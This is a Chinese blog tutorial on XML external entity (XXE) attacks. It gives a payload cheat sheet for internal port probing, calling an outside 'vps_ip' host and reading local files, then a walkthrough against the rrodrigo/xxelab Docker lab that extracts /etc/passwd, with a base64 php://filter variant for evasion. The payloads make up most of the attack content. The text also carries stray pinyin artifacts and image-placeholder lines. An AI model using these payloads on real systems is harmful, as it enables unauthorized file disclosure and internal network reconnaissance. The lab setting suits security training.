溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

利用xxe獲取linux系統(tǒng)的passwd

發(fā)布時(shí)間:2020-02-28 11:06:15 來(lái)源:網(wǎng)絡(luò) 閱讀:596 作者:hack_man 欄目:安全技術(shù)

引用外部DTD文件訪問(wèn)內(nèi)網(wǎng)主機(jī)/端口。

<!DOCTYPE a SYSTEM "http://127.0.0.1:2333"> (看響應(yīng)時(shí)間)

引用外部DTD文件訪問(wèn)wai網(wǎng)。

<!DOCTYPE a SYSTEM "http://vps_ip" >

引用內(nèi)部實(shí)體。

<!DOCTYPE a [<!ENTITY xxe "findneo">]><a>&xxe;</a>

外部實(shí)體讀本地文件。

<!DOCTYPE a [<!ENTITY xxe SYSTEM "file:///etc/hosts">]><a>&xxe;</a>

外部實(shí)體訪問(wèn)內(nèi)wang主機(jī)端口。

<!DOCTYPE a SYSTEM "http://192.168.1.2:80">(看響應(yīng)時(shí)間)

外部實(shí)體訪問(wèn)wai網(wǎng)。

<!DOCTYPE a [<!ENTITY xxe SYSTEM "http://vps_ip">]><a>&xxe;</a>

docker中下載rrodrigo/xxelab該鏡像

啟動(dòng):docker run -d -p 8082:80 rrodrigo/xxelab

利用xxe獲取linux系統(tǒng)的passwd

抓取注冊(cè)包,發(fā)現(xiàn)采用xml格式傳遞,且郵箱有返回:

利用xxe獲取linux系統(tǒng)的passwd

將返回內(nèi)容處進(jìn)行xxe回顯設(shè)置讀取/etc/passwd

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE c [
<!ENTITY file SYSTEM "/etc/passwd">
]>

利用xxe獲取linux系統(tǒng)的passwd

利用base64編碼進(jìn)行xxe,防止有返回包驗(yàn)證

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE c [
<!ENTITY file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">
]>

利用xxe獲取linux系統(tǒng)的passwd
返回base64數(shù)據(jù)包,base64解碼

利用xxe獲取linux系統(tǒng)的passwd

向AI問(wèn)一下細(xì)節(jié)
推薦閱讀:
  1. passwd命令
  2. xxe hacking

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI